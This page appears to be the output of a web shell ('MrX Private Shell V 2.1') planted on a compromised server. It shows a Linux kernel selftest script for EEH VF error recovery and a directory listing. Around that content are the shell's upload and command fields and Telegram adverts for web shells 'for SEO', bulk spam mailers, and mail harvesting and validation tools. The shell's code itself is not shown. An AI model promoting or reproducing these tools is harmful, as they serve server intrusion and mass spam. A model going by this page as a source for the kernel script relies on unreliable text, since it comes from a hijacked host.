__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
#!/bin/sh
# SPDX-License-Identifier: GPL-2.0-only

. ./eeh-functions.sh

eeh_test_prep # NB: may exit

vf_list="$(eeh_enable_vfs)";
if $? != 0 ; then
	log "No usable VFs found. Skipping EEH unaware VF test"
	exit $KSELFTESTS_SKIP;
fi

log "Enabled VFs: $vf_list"

tested=0
passed=0
for vf in $vf_list ; do
	log "Testing $vf"

	if ! eeh_can_recover $vf ; then
		log "Driver for $vf doesn't support error recovery, skipping"
		continue;
	fi

	tested="$((tested + 1))"

	log "Breaking $vf..."
	if ! eeh_one_dev $vf ; then
		log "$vf failed to recover"
		continue;
	fi

	passed="$((passed + 1))"
done

eeh_disable_vfs

if [ "$tested" == 0 ] ; then
	echo "No VFs with EEH aware drivers found, skipping"
	exit $KSELFTESTS_SKIP
fi

test "$failed" != 0
exit $?;

Filemanager

Name Type Size Permission Actions
Makefile File 196 B 0644
eeh-basic.sh File 1.15 KB 0755
eeh-functions.sh File 5.88 KB 0644
eeh-vf-aware.sh File 754 B 0755
eeh-vf-unaware.sh File 633 B 0755
Filemanager